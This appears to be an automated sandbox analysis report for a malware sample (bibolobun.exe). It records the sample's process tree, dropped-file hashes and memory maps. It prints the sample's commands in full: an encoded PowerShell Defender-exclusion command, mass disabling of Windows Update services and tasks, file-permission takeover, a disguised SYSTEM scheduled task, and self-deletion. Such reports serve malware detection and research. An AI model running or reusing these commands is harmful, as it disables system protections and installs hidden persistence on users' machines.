C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{c5e7a684-33e1-4a61-953c-e80758a4342e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"4⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "WindowsDefender"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"4⤵
- Deletes itself
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1293759430663324826-1314916948-1229506426-1330068696-766629609-1949643321524327098"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1440040433-1468375976-2492418801346303794-1496375062496222221-2099643894-1359535038"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-33451313610626340221906970602-15599551211303664306589748947427468733139417031"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-550362656-1065221663157404611111213571461811346152769055459822901363-937978055"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "10986125212024244219-417009599-185023194912080750596047353743617528341599138312"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Windows\Tasks\dialersvc32.jobFilesize
1KB
MD5e72e5014f067efec331f4738ec4cb4c9
SHA1b09fa92454cd39c029ebb7b8dd845dafe60a0946
SHA2568399bdcdb53cb3892b96cd8b2ff75e871d559db8bf469eb19354a975fa941dd1
SHA512c58f29e3e3fe6ace74b11cd64c71df6a5a514f7ccd1bcb2efb90d70752fdff1cdcf2d1c86a570e8e7a4f8192acd2dcaba2c9bf3f1d2d54669a646788def14a38
-
C:\Windows\system32\drivers\etc\hostsFilesize
3KB
MD5e546b81f1a1a1b753a4f6d3455394dec
SHA114f407db119dd97ed248be2a8d15a09ba938987a
SHA2561100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8
SHA51203f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
\Users\Admin\AppData\Roaming\5FEC.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Windows\System32\config\systemprofile\AppData\Roaming\C717.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/112-98-0x0000000000000000-mapping.dmp
-
memory/268-78-0x0000000000000000-mapping.dmp
-
memory/268-108-0x0000000000000000-mapping.dmp
-
memory/276-176-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/276-227-0x0000000001D50000-0x0000000001D7A000-memory.dmpFilesize
168KB
-
memory/276-228-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/300-225-0x0000000000A90000-0x0000000000ABA000-memory.dmpFilesize
168KB
-
memory/300-174-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/300-172-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/304-59-0x000007FEFBD81000-0x000007FEFBD83000-memory.dmpFilesize
8KB
-
memory/304-87-0x0000000001FB0000-0x0000000001FBA000-memory.dmpFilesize
40KB
-
memory/304-55-0x00000000006D0000-0x00000000006D6000-memory.dmpFilesize
24KB
-
memory/304-54-0x000000001BBA0000-0x000000001C072000-memory.dmpFilesize
4.8MB
-
memory/304-56-0x00000000000C0000-0x0000000000592000-memory.dmpFilesize
4.8MB
-
memory/304-57-0x000000001C070000-0x000000001C524000-memory.dmpFilesize
4.7MB
-
memory/304-58-0x00000000006E0000-0x00000000006E6000-memory.dmpFilesize
24KB
-
memory/380-79-0x0000000000000000-mapping.dmp
-
memory/416-127-0x00000000006C0000-0x00000000006E3000-memory.dmpFilesize
140KB
-
memory/416-213-0x00000000006C0000-0x00000000006E3000-memory.dmpFilesize
140KB
-
memory/416-129-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/416-214-0x00000000006F0000-0x000000000071A000-memory.dmpFilesize
168KB
-
memory/416-131-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/460-134-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/460-215-0x00000000000A0000-0x00000000000CA000-memory.dmpFilesize
168KB
-
memory/460-137-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/476-140-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/476-141-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/476-216-0x00000000000C0000-0x00000000000EA000-memory.dmpFilesize
168KB
-
memory/484-144-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/484-146-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/484-217-0x00000000004D0000-0x00000000004FA000-memory.dmpFilesize
168KB
-
memory/556-364-0x0000000000000000-mapping.dmp
-
memory/576-149-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/576-218-0x0000000000200000-0x000000000022A000-memory.dmpFilesize
168KB
-
memory/576-148-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/584-95-0x0000000000000000-mapping.dmp
-
memory/584-341-0x0000000000000000-mapping.dmp
-
memory/588-72-0x0000000000000000-mapping.dmp
-
memory/652-152-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/652-154-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/652-219-0x00000000001E0000-0x000000000020A000-memory.dmpFilesize
168KB
-
memory/664-69-0x0000000000000000-mapping.dmp
-
memory/676-84-0x0000000000000000-mapping.dmp
-
memory/732-220-0x00000000008C0000-0x00000000008EA000-memory.dmpFilesize
168KB
-
memory/732-156-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/732-158-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/796-221-0x0000000000820000-0x000000000084A000-memory.dmpFilesize
168KB
-
memory/796-160-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/796-162-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/820-305-0x0000000000000000-mapping.dmp
-
memory/820-308-0x0000000000180000-0x00000000001AA000-memory.dmpFilesize
168KB
-
memory/844-223-0x00000000008B0000-0x00000000008DA000-memory.dmpFilesize
168KB
-
memory/844-168-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/844-167-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/872-169-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/872-166-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmpFilesize
64KB
-
memory/872-222-0x0000000000950000-0x000000000097A000-memory.dmpFilesize
168KB
-
memory/892-337-0x0000000000000000-mapping.dmp
-
memory/940-97-0x0000000000000000-mapping.dmp
-
memory/944-94-0x0000000000000000-mapping.dmp
-
memory/976-96-0x0000000000000000-mapping.dmp
-
memory/1020-125-0x00000000773E0000-0x00000000774FF000-memory.dmpFilesize
1.1MB
-
memory/1020-85-0x0000000000000000-mapping.dmp
-
memory/1020-117-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1020-133-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1020-135-0x0000000077500000-0x00000000776A9000-memory.dmpFilesize
1.7MB
-
memory/1020-240-0x0000000000DD0000-0x0000000000DFA000-memory.dmpFilesize
168KB
-
memory/1020-120-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1020-118-0x00000001400033F4-mapping.dmp
-
memory/1020-123-0x0000000077500000-0x00000000776A9000-memory.dmpFilesize
1.7MB
-
memory/1032-231-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/1032-230-0x00000000008A0000-0x00000000008CA000-memory.dmpFilesize
168KB
-
memory/1064-80-0x0000000000000000-mapping.dmp
-
memory/1068-237-0x00000000006A0000-0x00000000006CA000-memory.dmpFilesize
168KB
-
memory/1068-359-0x0000000000000000-mapping.dmp
-
memory/1068-412-0x0000000000000000-mapping.dmp
-
memory/1068-262-0x00000000006A0000-0x00000000006CA000-memory.dmpFilesize
168KB
-
memory/1076-112-0x0000000000000000-mapping.dmp
-
memory/1088-239-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/1088-238-0x00000000003B0000-0x00000000003DA000-memory.dmpFilesize
168KB
-
memory/1096-102-0x0000000000000000-mapping.dmp
-
memory/1100-397-0x0000000000000000-mapping.dmp
-
memory/1120-265-0x0000000000C80000-0x0000000000CA1000-memory.dmpFilesize
132KB
-
memory/1120-248-0x00000000004039E0-mapping.dmp
-
memory/1120-71-0x0000000000000000-mapping.dmp
-
memory/1120-263-0x00000000776E0000-0x0000000077860000-memory.dmpFilesize
1.5MB
-
memory/1120-261-0x0000000000400000-0x0000000000435000-memory.dmpFilesize
212KB
-
memory/1212-76-0x0000000000000000-mapping.dmp
-
memory/1220-105-0x0000000000000000-mapping.dmp
-
memory/1220-338-0x0000000000000000-mapping.dmp
-
memory/1228-81-0x0000000000000000-mapping.dmp
-
memory/1260-229-0x0000000001DF0000-0x0000000001E1A000-memory.dmpFilesize
168KB
-
memory/1288-383-0x0000000000000000-mapping.dmp
-
memory/1288-319-0x0000000000000000-mapping.dmp
-
memory/1360-328-0x0000000000000000-mapping.dmp
-
memory/1364-232-0x0000000001B40000-0x0000000001B6A000-memory.dmpFilesize
168KB
-
memory/1376-67-0x0000000000000000-mapping.dmp
-
memory/1380-100-0x0000000000000000-mapping.dmp
-
memory/1420-236-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/1420-234-0x00000000026B0000-0x00000000026DA000-memory.dmpFilesize
168KB
-
memory/1468-260-0x0000000003C70000-0x0000000003C91000-memory.dmpFilesize
132KB
-
memory/1468-257-0x0000000003C50000-0x0000000003C6B000-memory.dmpFilesize
108KB
-
memory/1468-212-0x0000000074130000-0x00000000746DB000-memory.dmpFilesize
5.7MB
-
memory/1468-256-0x00000000776E0000-0x0000000077860000-memory.dmpFilesize
1.5MB
-
memory/1468-255-0x0000000074130000-0x00000000746DB000-memory.dmpFilesize
5.7MB
-
memory/1468-111-0x0000000076121000-0x0000000076123000-memory.dmpFilesize
8KB
-
memory/1468-109-0x0000000000000000-mapping.dmp
-
memory/1480-99-0x0000000000000000-mapping.dmp
-
memory/1480-469-0x0000000000000000-mapping.dmp
-
memory/1484-91-0x0000000000000000-mapping.dmp
-
memory/1488-289-0x0000000000F8B000-0x0000000000FAA000-memory.dmpFilesize
124KB
-
memory/1488-283-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/1488-82-0x0000000000000000-mapping.dmp
-
memory/1488-271-0x0000000000000000-mapping.dmp
-
memory/1488-282-0x0000000000830000-0x000000000085A000-memory.dmpFilesize
168KB
-
memory/1488-284-0x0000000000F84000-0x0000000000F87000-memory.dmpFilesize
12KB
-
memory/1488-287-0x0000000000B70000-0x0000000000B9A000-memory.dmpFilesize
168KB
-
memory/1488-288-0x0000000000F8B000-0x0000000000FAA000-memory.dmpFilesize
124KB
-
memory/1512-233-0x00000000002C0000-0x00000000002EA000-memory.dmpFilesize
168KB
-
memory/1532-121-0x0000000001234000-0x0000000001237000-memory.dmpFilesize
12KB
-
memory/1532-114-0x000007FEF37D0000-0x000007FEF432D000-memory.dmpFilesize
11.4MB
-
memory/1532-113-0x000007FEF4330000-0x000007FEF4D53000-memory.dmpFilesize
10.1MB
-
memory/1532-116-0x00000000773E0000-0x00000000774FF000-memory.dmpFilesize
1.1MB
-
memory/1532-115-0x0000000077500000-0x00000000776A9000-memory.dmpFilesize
1.7MB
-
memory/1532-126-0x00000000773E0000-0x00000000774FF000-memory.dmpFilesize
1.1MB
-
memory/1532-107-0x0000000000000000-mapping.dmp
-
memory/1532-122-0x000000000123B000-0x000000000125A000-memory.dmpFilesize
124KB
-
memory/1532-124-0x0000000077500000-0x00000000776A9000-memory.dmpFilesize
1.7MB
-
memory/1552-89-0x0000000140001844-mapping.dmp
-
memory/1588-363-0x0000000000000000-mapping.dmp
-
memory/1588-92-0x0000000000000000-mapping.dmp
-
memory/1636-68-0x0000000000000000-mapping.dmp
-
memory/1644-104-0x0000000000000000-mapping.dmp
-
memory/1664-83-0x0000000000000000-mapping.dmp
-
memory/1668-294-0x0000000000000000-mapping.dmp
-
memory/1668-309-0x0000000000510000-0x000000000053A000-memory.dmpFilesize
168KB
-
memory/1676-235-0x0000000000180000-0x00000000001AA000-memory.dmpFilesize
168KB
-
memory/1688-310-0x00000000001F0000-0x000000000021A000-memory.dmpFilesize
168KB
-
memory/1692-368-0x0000000000000000-mapping.dmp
-
memory/1724-75-0x0000000000000000-mapping.dmp
-
memory/1732-77-0x0000000000000000-mapping.dmp
-
memory/1760-74-0x0000000000000000-mapping.dmp
-
memory/1772-406-0x0000000000000000-mapping.dmp
-
memory/1804-322-0x0000000000000000-mapping.dmp
-
memory/1812-73-0x0000000000000000-mapping.dmp
-
memory/1892-241-0x00000000009E0000-0x0000000000A0A000-memory.dmpFilesize
168KB
-
memory/1900-66-0x00000000028EB000-0x000000000290A000-memory.dmpFilesize
124KB
-
memory/1900-64-0x00000000028E4000-0x00000000028E7000-memory.dmpFilesize
12KB
-
memory/1900-60-0x0000000000000000-mapping.dmp
-
memory/1900-62-0x000007FEEE290000-0x000007FEEECB3000-memory.dmpFilesize
10.1MB
-
memory/1900-258-0x00000000013A0000-0x00000000013CA000-memory.dmpFilesize
168KB
-
memory/1900-65-0x00000000028E4000-0x00000000028E7000-memory.dmpFilesize
12KB
-
memory/1900-63-0x000007FEED730000-0x000007FEEE28D000-memory.dmpFilesize
11.4MB
-
memory/1900-259-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/1904-448-0x0000000000000000-mapping.dmp
-
memory/1928-391-0x0000000000000000-mapping.dmp
-
memory/1976-285-0x00000000000E0000-0x000000000010A000-memory.dmpFilesize
168KB
-
memory/1976-286-0x0000000037540000-0x0000000037550000-memory.dmpFilesize
64KB
-
memory/1992-375-0x0000000000000000-mapping.dmp
-
memory/2012-93-0x0000000000000000-mapping.dmp
-
memory/2012-418-0x0000000000000000-mapping.dmp
-
memory/2016-101-0x0000000000000000-mapping.dmp
-
memory/2032-86-0x0000000000000000-mapping.dmp
-
memory/2044-70-0x0000000000000000-mapping.dmp